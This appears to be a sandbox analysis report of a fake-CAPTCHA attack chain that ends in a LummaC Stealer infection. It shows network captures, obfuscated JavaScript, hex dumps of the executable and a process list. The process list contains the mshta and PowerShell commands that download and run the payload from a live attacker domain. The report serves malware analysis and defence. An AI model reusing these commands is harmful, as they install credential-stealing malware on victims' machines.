                                                                                                                              x-content-type-options: nosniff
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2025-03-07 12:21:41 UTC805INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 24 2c 78 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 24 2c 78 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 34 33 37 28 6e 2d 34 39 39 2c 24 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 24 2c 78 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 34 33 37 28 24 2d 36 30 35 2c 72 29 7d 66 6f 72 28 76 61 72 20 74 3d 24 28 29 3b 3b 29 74 72 79 7b 69 66 28 70 61 72 73 65 49 6e 74 28 72 28 31 30 38 36 2c 31 30 36 39 2c 31 30 38 30 2c 31 30 39 37 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 6e 28 39 35 31 2c 39 32 39 2c 39 35 38 2c 39 35 34 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 72 28 31 31 33 30 2c 31 31 31 34 2c 31 31 31 33 2c 31 30 39 36 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 72 28 31 30 38 34 2c 31 30 36 35 2c 31 30 39 38
                                                                                                                              Data Ascii: !function($,x){function n($,x,n,r){return _0x2437(n-499,$)}function r($,x,n,r){return _0x2437($-605,r)}for(var t=$();;)try{if(parseInt(r(1086,1069,1080,1097))/1+parseInt(n(951,929,958,954))/2+-parseInt(r(1130,1114,1113,1096))/3*(-parseInt(r(1084,1065,1098
                                                                                                                              2025-03-07 12:21:41 UTC7096INData Raw: 78 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 6e 28 24 2c 78 2d 32 30 33 2c 78 2d 20 2d 37 32 36 2c 74 2d 32 33 30 29 7d 69 66 28 78 5b 65 28 39 37 2c 31 32 37 2c 31 33 39 2c 39 39 29 5d 28 63 28 31 33 35 35 2c 31 33 36 37 2c 31 33 32 37 2c 31 33 35 34 29 2c 78 5b 63 28 31 34 30 35 2c 31 34 31 36 2c 31 33 38 34 2c 31 33 38 36 29 5d 29 29 7b 76 61 72 20 75 3d 72 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 7b 76 61 72 20 78 3d 74 5b 65 28 31 35 31 33 2c 31 33 30 2c 31 32 37 32 2c 31 33 37 38 29 5d 28 24 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 74 3d 6e 75 6c 6c 2c 78 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 72 3d 21 31 2c 75 7d 69 66 28 5f 30 78 34 36 62 30 66 37 29 7b 76 61 72 20 69 3d 5f 30 78 33 63 36 31 66
                                                                                                                              Data Ascii: x,r,t){return n($,x-203,x- -726,t-230)}if(x[e(97,127,139,99)](c(1355,1367,1327,1354),x[c(1405,1416,1384,1386)])){var u=r?function(){if(t){var x=t[e(1513,130,1272,1378)]($,arguments);return t=null,x}}:function(){};return r=!1,u}if(_0x46b0f7){var i=_0x3c61f


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.849722190.92.154.206443760C:\Windows\SysWOW64\mshta.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-03-07 12:21:53 UTC309OUTGET /p.php HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-CH
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: rea.grupolalegion.ec
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-03-07 12:21:53 UTC485INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              content-length: 693
                                                                                                                              date: Fri, 07 Mar 2025 12:21:53 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2025-03-07 12:21:53 UTC693INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 49 44 3d 22 43 53 22 20 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 3d 22 43 61 70 74 63 68 61 22 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 20 4d 41 58 49 4d 49 5a 45 42 55 54 54 4f 4e 3d 22 6e 6f 22 20 4d 49 4e 49 4d 49 5a 45 42 55 54 54 4f 4e 3d 22 6e 6f 22 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 3e 3c 73 63 72 69 70 74 3e 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 73 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 2e 52 75 6e 28 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 65 70 20 42 79 70 61 73 73 20 2d 6e 6f 70 20 2d 63 20 5c 22 49 6e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"In


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.849723190.92.154.2064435292C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-03-07 12:21:57 UTC174OUTGET /Viber.exe HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                              Host: rea.grupolalegion.ec
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2025-03-07 12:21:58 UTC564INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              content-type: application/x-msdownload
                                                                                                                              last-modified: Tue, 04 Mar 2025 06:02:20 GMT
                                                                                                                              accept-ranges: bytes
                                                                                                                              content-length: 2142592
                                                                                                                              date: Fri, 07 Mar 2025 12:21:57 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              content-disposition: attachment
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2025-03-07 12:21:58 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 44 1e 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 28 0b 00 00 d6 02 00 00 00 00 00 c0 0c 07 00 00 10 00 00 00 20 1d 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 10 23 00 00 04 00 00 fa 71 21 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELD( @#q!@
                                                                                                                              2025-03-07 12:21:58 UTC16384INData Raw: 00 00 00 90 8b 4c 24 3c 89 c8 83 c1 ff 8b 7c 24 40 89 fa 83 d2 ff 21 c1 21 d7 8b 5c 24 5c 8b 6c 24 60 8b 74 24 58 85 c9 0f 95 c0 85 ff 0f 95 c2 09 c2 84 d2 74 8c 89 4c 24 3c 89 7c 24 40 8b 43 34 8b 53 3c 0f bc e9 75 0d 0f bc ef 75 05 bd 20 00 00 00 83 c5 20 c1 ed 03 89 6c 24 44 0f af c5 83 c0 08 90 90 90 03 44 24 50 f7 c2 04 00 00 00 74 02 8b 00 89 44 24 4c 8b 4b 20 8b 51 10 8b 0a 8b 5c 24 64 89 1c 24 89 44 24 04 ff d1 0f b6 44 24 08 84 c0 0f 84 69 ff ff ff 8b 44 24 5c 8b 48 34 8b 54 24 44 0f af ca 03 48 38 83 c1 08 8b 40 3c 90 03 4c 24 50 a9 08 00 00 00 74 02 8b 09 8b 44 24 4c 89 44 24 68 89 4c 24 6c c6 44 24 70 01 83 c4 54 c3 c7 44 24 68 00 00 00 00 c7 44 24 6c 00 00 00 00 c6 44 24 70 00 83 c4 54 c3 e8 7e a0 06 00 e9 c9 fd ff ff cc cc cc cc cc cc cc cc
                                                                                                                              Data Ascii: L$<|$@!!\$\l$`t$XtL$<|$@C4S<uu l$DD$PtD$LK Q\$d$D$D$iD$\H4T$DH8@<L$PtD$LD$hL$lD$pTD$hD$lD$pT~
                                                                                                                              2025-03-07 12:21:58 UTC16384INData Raw: d2 75 04 31 c0 eb 19 89 04 24 89 5c 24 04 c7 44 24 08 17 00 00 00 e8 05 a4 ff ff 0f b6 44 24 0c 88 44 24 1c 83 c4 10 c3 e8 43 61 06 00 eb a1 cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 76 60 8b 44 24 04 0f b7 08 8b 54 24 08 66 39 0a 75 4a 0f b7 48 02 66 39 4a 02 75 40 0f b7 48 04 66 39 4a 04 75 36 0f b6 48 06 38 4a 06 75 2d 8b 48 08 39 4a 08 75 25 8b 48 0c 39 4a 0c 75 16 8b 4a 10 8b 52 14 39 48 10 0f 94 c1 39 50 14 0f 94 c0 21 c8 eb 02 31 c0 88 44 24 0c c3 c6 44 24 0c 00 c3 e8 cb 60 06 00 eb 89 cc cc cc cc cc cc cc cc cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 b9 00 00 00 83 ec 10 8b 44 24 14 8b 48 04 8b 54 24 18 39 4a 04 0f 85 98 00 00 00 8b 5a 0c 39 58 0c 0f 85 8c 00 00 00 8b 58 10 39 5a 10 0f 85 80 00 00 00 8b 5a 18 39 58 18 75 78 0f b6 58 1c
                                                                                                                              Data Ascii: u1$\$D$D$D$Ca_d;av`D$T$f9uJHf9Ju@Hf9Ju6H8Ju-H9Ju%H9JuJR9H9P!1D$D$`_d;aD$HT$9JZ9XX9ZZ9XuxX
                                                                                                                              2025-03-07 12:21:58 UTC16384INData Raw: 8b 44 24 04 8b 4c 24 08 89 c2 8b 84 24 88 00 00 00 89 54 24 44 89 4c 24 30 8b 40 08 89 04 24 e8 3c 75 05 00 8b 84 24 88 00 00 00 8b 48 04 8b 54 24 04 8b 5c 24 08 85 c9 0f 84 a0 02 00 00 89 5c 24 38 89 54 24 4c 89 0c 24 e8 12 75 05 00 8b 84 24 88 00 00 00 8b 48 10 8b 54 24 04 8b 5c 24 08 85 c9 0f 85 c4 01 00 00 89 5c 24 34 89 54 24 48 8d 7c 24 54 31 c0 e8 09 37 06 00 c7 44 24 58 16 00 00 00 8d 0d e5 79 4d 00 89 4c 24 54 8b 4c 24 30 89 4c 24 60 8b 4c 24 44 89 4c 24 5c c7 44 24 68 04 00 00 00 8d 0d 37 41 4d 00 89 4c 24 64 89 5c 24 70 89 54 24 6c c7 44 24 78 06 00 00 00 8d 0d 0f 43 4d 00 89 4c 24 74 8b 4c 24 38 89 8c 24 80 00 00 00 8b 4c 24 4c 89 4c 24 7c c7 04 24 00 00 00 00 8d 4c 24 54 89 4c 24 04 c7 44 24 08 06 00 00 00 c7 44 24 0c 06 00 00 00 e8 b0 65 04
                                                                                                                              Data Ascii: D$L$$T$DL$0@$<u$HT$\$\$8T$L$u$HT$\$\$4T$H|$T17D$XyML$TL$0L$`L$DL$\D$h7AML$d\$pT$lD$xCML$tL$8$L$LL$|$L$TL$D$D$e
                                                                                                                              2025-03-07 12:21:58 UTC16384INData Raw: 44 24 04 00 e8 67 20 ff ff 0f b6 44 24 08 f6 c0 01 74 6e f6 c0 02 74 0c 8b 44 24 14 89 04 24 e8 8c 00 00 00 8b 44 24 0c 8b 40 18 84 00 05 48 01 00 00 89 04 24 8b 44 24 14 89 44 24 04 e8 2e 27 02 00 8b 44 24 0c 8b 48 18 ff 49 7c 8b 48 18 8b 49 7c 85 c9 7c 15 75 0f 0f b6 48 69 84 c9 74 07 c7 40 08 de fa ff ff 83 c4 10 c3 8d 05 72 8c 4d 00 89 04 24 c7 44 24 04 1b 00 00 00 e8 9f a9 05 00 8d 05 eb 7d 4d 00 89 04 24 c7 44 24 04 17 00 00 00 e8 89 a9 05 00 90 e8 d3 e0 05 00 e9 2e ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 01 02 00 00 83 ec 2c 8b 44 24 30 84 00 89 04 24 e8 4b 1e ff ff 8b 05 e4 a2 5f 00 64 8b 00 8b 00 8b 40 18 8b 88 58 04 00 00 8b 90 5c 04 00 00 89 cb c1 e1 11 31 d9 89 d3 31 ca c1 e9 07 31 d1
                                                                                                                              Data Ascii: D$g D$tntD$$D$@H$D$D$.'D$HI|HI||uHit@rM$D$}M$D$._d;a,D$0$K_d@X\111
                                                                                                                              2025-03-07 12:21:58 UTC16384INData Raw: 4c 24 18 8b 40 0c 89 44 24 14 e8 01 74 02 00 8d 05 21 56 4d 00 89 04 24 c7 44 24 04 0d 00 00 00 e8 3b 7c 02 00 8b 44 24 14 89 04 24 c7 44 24 04 00 00 00 00 e8 b7 7a 02 00 8d 05 60 52 4d 00 89 04 24 c7 44 24 04 0c 00 00 00 e8 11 7c 02 00 8b 44 24 18 89 04 24 c7 44 24 04 00 00 00 00 e8 8d 7a 02 00 8d 05 6c 52 4d 00 89 04 24 c7 44 24 04 0c 00 00 00 e8 e7 7b 02 00 8b 44 24 1c 89 04 24 c7 44 24 04 00 00 00 00 e8 c3 78 02 00 e8 de 73 02 00 e9 35 fe ff ff e8 74 73 02 00 8d 05 e7 85 4d 00 89 04 24 c7 44 24 04 19 00 00 00 e8 ae 7b 02 00 e8 b9 73 02 00 e9 30 ff ff ff e8 af a0 05 00 e9 aa fd ff ff cc cc cc cc cc cc cc cc cc cc 83 ec 1c 8b 4c 24 2c 89 c8 c1 e8 02 c1 e9 05 83 e0 07 8b 15 e4 a2 5f 00 64 8b 12 8b 12 8b 52 18 8b 52 58 89 54 24 18 84 02 89 cb 89 c1 bd 01
                                                                                                                              Data Ascii: L$@D$t!VM$D$;|D$$D$z`RM$D$|D$$D$zlRM$D${D$$D$xs5tsM$D${s0L$,_dRRXT$
                                                                                                                              2025-03-07 12:21:58 UTC16384INData Raw: a3 5f 00 8b 4c 24 10 8d 0c 89 85 c0 75 12 8b 44 24 20 8b 54 24 14 8b 5c 24 28 8b 6c 24 2c eb 40 e8 bb 75 05 00 8b 44 24 20 89 07 8b 54 24 14 8b 5c 8a 10 89 5f 04 8b 5c 24 28 89 5f 08 8b 6c 8a 1c 89 6f 0c 8b 6c 24 2c 89 6f 10 8b 74 8a 20 89 77 14 8b 74 24 1c 89 77 18 8b 74 8a 14 89 77 1c 89 44 8a 10 8b 44 24 24 89 44 8a 18 89 5c 8a 1c 89 6c 8a 20 8b 44 24 1c 89 44 8a 14 90 90 8d 05 04 a2 5f 00 89 04 24 e8 44 7f ff ff 90 8d 05 00 a2 5f 00 89 04 24 c7 44 24 04 08 00 00 00 e8 fd a0 fe ff 83 c4 18 c3 b9 cc 00 00 00 e8 4f 75 05 00 8d 15 1c 22 5d 00 0f b6 1c 02 8d 2d 60 a6 5f 00 88 5c 0d 00 8d 41 01 3d 80 00 00 00 0f 8d dd fe ff ff 89 c1 b8 cd cc cc cc f7 e9 01 ca c1 fa 02 8d 14 92 89 c8 29 d0 83 f8 05 72 c4 b9 05 00 00 00 e8 f9 74 05 00 8d 05 a9 82 4d 00 89 04
                                                                                                                              Data Ascii: _L$uD$ T$\$(l$,@uD$ T$\_\$(_lol$,ot wt$wtwDD$$D\l D$D_$D_$D$Ou"]-`_\A=)rtM
                                                                                                                              2025-03-07 12:21:58 UTC16384INData Raw: 4d 00 89 04 24 c7 44 24 04 2b 00 00 00 e8 0e ea 04 00 90 e8 d8 20 05 00 e9 63 fe ff ff cc cc cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 81 00 00 00 83 ec 0c 8b 44 24 10 85 c0 74 27 8b 88 6c 09 00 00 85 c9 74 1d 8b 49 0c 85 c9 75 0d 8b 80 70 09 00 00 8b 40 0c 85 c0 74 09 c6 44 24 14 01 83 c4 0c c3 8d 05 c0 b9 5d 00 89 04 24 e8 ac 60 fe ff 8b 44 24 04 8b 4c 24 08 85 c0 0f 94 c0 85 c9 0f 94 c1 21 c1 84 c9 74 20 8b 05 70 ba 5d 00 39 05 74 ba 5d 00 76 09 c6 44 24 14 01 83 c4 0c c3 c6 44 24 14 00 83 c4 0c c3 c6 44 24 14 01 83 c4 0c c3 e8 b6 20 05 00 e9 61 ff ff ff cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 a8 04 00 00 83 ec 44 83 3d 14 a2 5f 00 02 0f 85 81 04 00 00 8b 44 24 48 89 05 7c ba 5d 00 8b 44 24 4c 89 05 80 ba 5d 00 8b 05 c0 b9 5d 00 89
                                                                                                                              Data Ascii: M$D$+ c_d;aD$t'ltIup@tD$]$`D$L$!t p]9t]vD$D$D$ a_d;aD=_D$H|]D$L]]
                                                                                                                              2025-03-07 12:21:59 UTC16384INData Raw: 00 00 e8 59 bc 01 00 8b 44 24 1c 89 04 24 c7 44 24 04 00 00 00 00 e8 35 b9 01 00 e8 f0 b5 01 00 e8 4b b4 01 00 8d 05 ce a0 4d 00 89 04 24 c7 44 24 04 20 00 00 00 e8 e5 a9 04 00 90 8b 84 24 90 00 00 00 89 04 24 e8 45 1e fe ff 8b 84 24 98 00 00 00 8b 48 54 89 8c 24 88 00 00 00 8b 40 58 89 84 24 84 00 00 00 8b 44 24 04 89 44 24 24 e8 9d b3 01 00 8d 05 95 7a 4d 00 89 04 24 c7 44 24 04 16 00 00 00 e8 d7 bb 01 00 8b 84 24 98 00 00 00 89 04 24 e8 48 bb 01 00 8d 05 9c 44 4d 00 89 04 24 c7 44 24 04 07 00 00 00 e8 b2 bb 01 00 8b 84 24 88 00 00 00 89 04 24 8b 84 24 84 00 00 00 89 44 24 04 e8 88 b8 01 00 8d 05 71 6d 4d 00 89 04 24 c7 44 24 04 13 00 00 00 e8 82 bb 01 00 8b 44 24 24 89 04 24 c7 44 24 04 00 00 00 00 e8 fe b9 01 00 e8 19 b5 01 00 e8 74 b3 01 00 8d 05 ab
                                                                                                                              Data Ascii: YD$$D$5KM$D$ $$E$HT$@X$D$D$$zM$D$$$HDM$D$$$$D$qmM$D$D$$$D$t
                                                                                                                              2025-03-07 12:21:59 UTC16384INData Raw: 24 c7 44 24 04 0c 00 00 00 e8 52 7c 01 00 8b 44 24 24 89 04 24 8b 44 24 28 89 44 24 04 e8 2e 79 01 00 e8 e9 75 01 00 e8 44 74 01 00 8d 05 6a c9 4d 00 89 04 24 c7 44 24 04 2d 00 00 00 e8 de 69 04 00 90 e8 28 a1 04 00 e9 43 fc ff ff cc cc cc 8b 0d e4 a2 5f 00 64 8b 09 8b 09 3b 61 08 0f 86 8e 02 00 00 83 ec 48 8b 44 24 4c 84 00 0f b6 4c 24 50 84 c9 74 1d 83 c0 50 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 e8 af e0 fd ff eb 36 8d 48 68 83 c0 50 89 44 24 44 89 0c 24 e8 7b e0 fd ff 8b 44 24 04 8b 4c 24 08 8b 54 24 44 89 14 24 05 00 00 10 00 89 44 24 04 83 d1 00 89 4c 24 08 e8 77 e0 fd ff 8b 44 24 4c 89 04 24 e8 ab de fd ff 8b 44 24 04 85 c0 7d 0f ba ff ff ff ff b9 ff ff ff ff e9 fc 00 00 00 89 44 24 20 c1 f8 1f 89 44 24 38 8b 44 24 4c 8d 88 80 00
                                                                                                                              Data Ascii: $D$R|D$$$D$(D$.yuDtjM$D$-i(C_d;aHD$LL$PtP$D$D$6HhPD$D${D$L$T$D$D$L$wD$L$D$}D$ D$8D$L


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:07:21:21
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                              Imagebase:0x7ff678760000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:07:21:26
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1924,i,3712918176845887802,6985471661213031996,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                              Imagebase:0x7ff678760000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:07:21:34
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1"
                                                                                                                              Imagebase:0x7ff678760000
                                                                                                                              File size:3'242'272 bytes
                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:07:21:49
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:cmd /K mshta https://rea.grupolalegion.ec/p.php
                                                                                                                              Imagebase:0xa40000
                                                                                                                              File size:236'544 bytes
                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:7
                                                                                                                              Start time:07:21:49
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:07:21:49
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:mshta https://rea.grupolalegion.ec/p.php
                                                                                                                              Imagebase:0x4b0000
                                                                                                                              File size:13'312 bytes
                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:10
                                                                                                                              Start time:07:21:53
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://rea.grupolalegion.ec/Viber.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
                                                                                                                              Imagebase:0xa0000
                                                                                                                              File size:433'152 bytes
                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:07:21:53
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:12
                                                                                                                              Start time:07:22:01
                                                                                                                              Start date:07/03/2025
                                                                                                                              Path:C:\ProgramData\Captcha.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\ProgramData\Captcha.exe"
                                                                                                                              Imagebase:0x500000
                                                                                                                              File size:2'142'592 bytes
                                                                                                                              MD5 hash:05B7F29D1BAEAC0A7513D094BFC12A92
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000003.1835568834.0000000001632000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2319031426.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000002.2319503961.0000000001632000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000C.00000003.1835568834.00000000014AC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 39%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:15
                                                                                                                              Start time:07:22:40
                                                                                                                              Start date:07/03/2025
